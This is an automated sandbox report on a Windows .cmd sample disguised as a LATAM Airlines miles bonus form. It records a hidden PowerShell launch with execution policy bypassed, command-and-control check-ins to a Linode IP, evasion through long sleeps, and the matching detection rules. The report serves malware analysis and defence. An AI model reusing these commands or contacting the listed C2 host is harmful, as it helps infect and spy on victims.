Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd

Overview

General Information

Sample name:FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd
Analysis ID:1545639
MD5:79c7b5a0efe2c269321b4f082e1efab1
SHA1:cc3a038e4f505f5f83ccb2994adb5cc6d29f594b
SHA256:890c0c8d8d06a37b866b875bd679c8147a4a4c3dd8dbc5f0c072630b31d035e0
Tags:cmdLATAMAirlinesMekotiouser-JAMESWT_MHT
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
AI detected suspicious sample
Sigma detected: Suspicious PowerShell Parameter Substring
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level

Classification

  • System is w10x64
  • cmd.exe (PID: 2268 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5552 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo %VTXm22MebfrD% " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 3884 cmdline: cmd.exe /c powershell.exe -exec bypass -nop -win 1 - MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4140 cmdline: powershell.exe -exec bypass -nop -win 1 - MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
amsi64_4140.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -exec bypass -nop -win 1 -, CommandLine: powershell.exe -exec bypass -nop -win 1 -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe -exec bypass -nop -win 1 -, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3884, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -exec bypass -nop -win 1 -, ProcessId: 4140, ProcessName: powershell.exe
    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -exec bypass -nop -win 1 -, CommandLine: powershell.exe -exec bypass -nop -win 1 -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe -exec bypass -nop -win 1 -, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3884, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -exec bypass -nop -win 1 -, ProcessId: 4140, ProcessName: powershell.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -exec bypass -nop -win 1 -, CommandLine: powershell.exe -exec bypass -nop -win 1 -, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe -exec bypass -nop -win 1 -, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3884, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -exec bypass -nop -win 1 -, ProcessId: 4140, ProcessName: powershell.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-30T19:12:03.035929+010020559031Malware Command and Control Activity Detected192.168.2.649712172.104.150.668901TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2055903 - Severity 1 - ET MALWARE PS1/ExfiltracaoBot CnC Checkin : 192.168.2.6:49712 -> 172.104.150.66:8901
    Source: global trafficHTTP traffic detected: GET /contadores/pCK0xoI.php?4Fg0=7CWdVPWuoeIbH5GfMQlhkLVOOLluKpESrzGGXh7u3gGckRvxeoKC18Y6sPgy2viFd7m HTTP/1.1Host: 172.104.150.66Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
    Source: unknownDNS query: name: ipinfo.io
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownTCP traffic detected without corresponding DNS query: 172.104.150.66
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /contadores/pCK0xoI.php?4Fg0=7CWdVPWuoeIbH5GfMQlhkLVOOLluKpESrzGGXh7u3gGckRvxeoKC18Y6sPgy2viFd7m HTTP/1.1Host: 172.104.150.66Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: classification engineClassification label: mal64.evad.winCMD@8/4@1/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\3010Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edt1mznf.nqj.ps1Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd" "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %VTXm22MebfrD% "
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe -exec bypass -nop -win 1 -
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -exec bypass -nop -win 1 -
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %VTXm22MebfrD% "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdStatic file information: File size 11373396 > 1048576
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5058Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4822Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1468Thread sleep count: 5058 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep count: 4822 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960Thread sleep time: -7378697629483816s >= -30000sJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Yara matchFile source: amsi64_4140.amsi.csv, type: OTHER
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %VTXm22MebfrD% "Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -exec bypass -nop -win 1 -Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
